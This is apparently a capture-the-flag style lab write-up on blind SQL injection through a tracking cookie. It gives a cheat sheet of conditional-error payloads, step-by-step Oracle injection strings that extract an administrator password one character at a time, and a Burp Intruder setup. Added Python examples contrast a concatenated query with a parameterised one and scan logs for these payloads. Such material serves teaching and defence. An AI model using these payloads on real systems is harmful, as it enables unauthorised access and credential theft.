Problem Statement:
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
Conditional errors
You can test a single boolean condition and trigger a database error if the condition is true.
Oracle | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN TO_CHAR(1/0) ELSE NULL END FROM dual |
Microsoft | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END |
PostgreSQL | 1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN CAST(1/0 AS INTEGER) ELSE NULL END) |
MySQL | SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') |
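As an added example (not part of this writeup or of the lab), the following Python stand-in shows why the cookie lookup behaves the way the cheat sheet predicts, and why binding the cookie as a parameter removes the error oracle entirely. It uses an in-memory SQLite table named tracking (a constructed schema, not the lab's), and because SQLite returns NULL rather than an error for 1/0, it uses SQLite's abs() integer-overflow error in place of Oracle's TO_CHAR(1/0) as the error-raising expression.

```python
import sqlite3

# Constructed stand-in for the lab's analytics store: one table holding
# tracking cookie values. This is not the lab's real schema.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tracking (id TEXT)")
    con.execute("INSERT INTO tracking VALUES ('abc123')")
    return con

def lookup_vulnerable(con, cookie):
    """Builds the SQL by string concatenation, as the lab's application does.
    Returns the HTTP status the application would send: 500 on any database
    error (the custom error page), 200 otherwise, regardless of rows found."""
    sql = f"SELECT id FROM tracking WHERE id = '{cookie}'"
    try:
        con.execute(sql).fetchall()
        return 200
    except sqlite3.Error:
        return 500

def lookup_hardened(con, cookie):
    """Same lookup with the cookie bound as a parameter: the value can never
    change the query's structure, so there is no error for a condition to trigger."""
    con.execute("SELECT id FROM tracking WHERE id = ?", (cookie,)).fetchall()
    return 200

# SQLite has no TO_CHAR(1/0) error: 1/0 just yields NULL. abs() of the
# smallest 64-bit integer raises "integer overflow", so it plays the same
# role as TO_CHAR(1/0) in the Oracle payloads above.
ERROR_EXPR = "abs(-9223372036854775807-1)"

# Probes in the order the writeup uses them: step 1 (quote / two quotes),
# then step 2 (a true and a false condition).
PROBES = {
    "single_quote": "abc123'",
    "two_quotes": "abc123''",
    "cond_true": f"x' UNION SELECT CASE WHEN (1=1) THEN {ERROR_EXPR} ELSE NULL END--",
    "cond_false": f"x' UNION SELECT CASE WHEN (1=2) THEN {ERROR_EXPR} ELSE NULL END--",
}

def run_probes():
    """Returns {probe_name: (status_from_vulnerable, status_from_hardened)}."""
    con = make_db()
    return {name: (lookup_vulnerable(con, c), lookup_hardened(con, c))
            for name, c in PROBES.items()}

if __name__ == "__main__":
    for name, (vuln, safe) in run_probes().items():
        print(f"{name:13} vulnerable={vuln} hardened={safe}")
```

Running it shows the vulnerable lookup answering 500 for the single quote and for the true condition and 200 otherwise, exactly the yes/no channel the steps below rely on, while the parameterised lookup answers 200 for every probe because the cookie is only ever treated as a value.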
Step-by-step instructions to solve this lab.
STEP 1: Generate the error.
We type a single quote in the tracking cookie and send the request. The quote breaks the string literal in the query, so the application returns its custom error page.
TrackingId=X'

If we send two quotes, the string literal is closed correctly, the query is valid again and the application returns HTTP 200.
TrackingId=X''

STEP 2: You can test a single boolean condition and trigger a database error if the condition is true.
When the condition is true, 1/0 is evaluated and an Internal Server Error (HTTP 500) is returned; when it is false, the query completes normally.
Note: In the query below the condition is 1=1, which is true, so to_char(1/0) is evaluated and generates the error.
Query: TrackingId=X'+UNION+SELECT+CASE+When+(1=1)+Then+to_char(1/0)+ELSE+NULL+END+From+dual--

When the condition is false (1=2), the response is HTTP 200.
Query: TrackingId=X'+UNION+SELECT+CASE+When+(1=2)+Then+to_char(1/0)+ELSE+NULL+END+From+dual--

STEP 3: Using the same technique, we can now verify whether the username administrator exists. If it does, the condition is true and the error is generated.
Query:
TrackingId=X'+UNION+SELECT+CASE+When+(username='administrator')+Then+to_char(1/0)+ELSE+NULL+END+From+users--

STEP 4: Next we confirm whether the password is longer than a given number of characters. If the condition is true, the error is triggered and we get an HTTP 500 response.
Query: In the query below we test whether the password length is greater than 19, and we get HTTP 500 in response.
TrackingId=X'+UNION+SELECT+CASE+When+(username='administrator'+AND+length(password)>19)+Then+to_char(1/0)+ELSE+NULL+END+From+users--

Query: In the query below we test whether the password length is greater than 20, and we get HTTP 200 in response. This means the password length is exactly 20 characters.
TrackingId=X'+UNION+SELECT+CASE+When+(username='administrator'+AND+length(password)>20)+Then+to_char(1/0)+ELSE+NULL+END+From+users--

STEP 5: We will use the SUBSTR function. In Oracle it is written as substr(), for example substr(password,1,1) in the query below, which returns the first character of the password.
Note: SUBSTRING in SQL is a function used to retrieve characters from a string. With the help of this function, you can retrieve any number of substrings from a single string.

Query: Based on the query below we will be able to find out the password, one character at a time. The condition is true (HTTP 500) only when the first character of the password is 'a'.
TrackingId=X'+UNION+SELECT+CASE+When+(username='administrator'+AND+substr(password,1,1)='a')+Then+to_char(1/0)+ELSE+NULL+END+From+users--

STEP 6: We already know the password is 20 characters long. Now we set up the payload to find out which character is in which position.
As mentioned above, we use substr(password,$1$,1)='$a$'; the two payload positions are the starting position within the password and the candidate character.
Attack type: Cluster Bomb.
It looks like this in Burp Suite's Intruder tab.

So there are 2 payloads.
Payload 1 = the numbers 0 to 20 (the position).

Payload 2 = the letters a to z and the numbers 0 to 20 (the candidate character).

Now we start the attack. As you can see, I found 20 hits with status 500; the position and character from each of those hits together make up the password.

Lab is solved.
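From the defender's side, the technique walked through above leaves a recognisable trail: one client whose tracking cookie carries SQL fragments and whose requests alternate between HTTP 200 and the custom error page. As an added example (not part of this writeup or of the lab), this Python script scans constructed access-log lines (client ip, status, TrackingId value; invented for the example, not captured traffic) for the conditional-error signatures from the cheat sheet and reports the clients worth investigating.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (client ip, HTTP status, TrackingId cookie value).
# These are invented for the example, not captured lab traffic.
SAMPLE_LOG = """\
10.0.0.5 200 TrackingId=abc123
10.0.0.9 500 TrackingId=X'
10.0.0.9 200 TrackingId=X''
10.0.0.9 500 TrackingId=X'+UNION+SELECT+CASE+WHEN+(username%3D'administrator'+AND+substr(password,1,1)%3D'a')+THEN+to_char(1/0)+ELSE+NULL+END+FROM+users--
10.0.0.9 200 TrackingId=X'+UNION+SELECT+CASE+WHEN+(username%3D'administrator'+AND+substr(password,1,1)%3D'b')+THEN+to_char(1/0)+ELSE+NULL+END+FROM+users--
10.0.0.7 200 TrackingId=zzz999
"""

LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<status>\d{3}) TrackingId=(?P<cookie>\S*)$")

# Signatures of the conditional-error payloads from the cheat sheet above.
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("case_when", re.compile(r"\bcase\s+when\b", re.I)),
    ("to_char_div_zero", re.compile(r"to_char\s*\(\s*1\s*/\s*0\s*\)", re.I)),
    ("substr_password", re.compile(r"\bsubstr(ing)?\s*\(\s*password", re.I)),
]

def classify(cookie):
    """Decode a cookie value (Intruder sends '+' and %XX encoding) and return
    the names of the signatures it matches. An odd number of single quotes is
    the step-1 probe: it breaks the string literal in the query."""
    decoded = unquote_plus(cookie)
    hits = [name for name, rx in SIGNATURES if rx.search(decoded)]
    if decoded.count("'") % 2 == 1:
        hits.append("unbalanced_quote")
    return hits

def analyse(log_text):
    """Per-client summary: request count, error-page count, number of tagged
    requests and the set of signatures seen."""
    report = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # ignore lines without a tracking cookie
        entry = report.setdefault(m["ip"], {"requests": 0, "errors": 0,
                                            "tagged": 0, "signatures": set()})
        entry["requests"] += 1
        if m["status"] == "500":
            entry["errors"] += 1
        hits = classify(m["cookie"])
        if hits:
            entry["tagged"] += 1
            entry["signatures"].update(hits)
    return report

def suspicious_clients(log_text):
    """Clients with at least one tagged request. A cluster-bomb run like the
    one in step 6 also shows up as a burst of requests mixing 200 and 500."""
    return sorted(ip for ip, e in analyse(log_text).items() if e["tagged"] > 0)

if __name__ == "__main__":
    for ip, e in analyse(SAMPLE_LOG).items():
        print(ip, e["requests"], "requests,", e["errors"], "errors,",
              sorted(e["signatures"]))
```

On the sample lines only 10.0.0.9 is reported: its single-quote probe, and both substr payloads, are tagged, while the two-quote probe is balanced and matches nothing, which is why the error count per client is the more robust indicator than any one signature.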
